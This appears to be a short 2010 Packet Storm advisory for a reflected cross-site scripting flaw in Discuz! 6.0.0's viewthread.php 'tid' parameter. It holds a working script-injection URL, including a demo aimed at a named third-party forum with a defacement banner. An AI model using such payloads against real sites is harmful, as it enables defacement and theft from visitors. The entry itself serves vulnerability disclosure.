Discuz! 6.0.0 Cross Site Scripting

2010-01-27T00:00:00
ID PACKETSTORM:85656
Type packetstorm
Reporter s4r4d0
Modified 2010-01-27T00:00:00

Description

                                        
                                            `# Discuz! 6.0.0  
# Download:  
http://www.comsenz.com/downloads/install/discuz  
# Vendor: www.comsenz.com  
# Author: s4r4d0  
# mail: s4r4d0@yahoo.com  
# Bug: Cross site scripting has benn found on viewthread.php file.  
# Exploit: http://host/bbs/viewthread.php?tid=[Xss]  
# Demo: http://www.socvista.com/bbs/viewthread.php?tid=">><script>alert(HACKED BY FATAL ERROR)</script><marquee><h1>XSS By Fatal  
Error</h1></marquee>  
# Made in Brazil  
# Team: Fatal Error   
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
`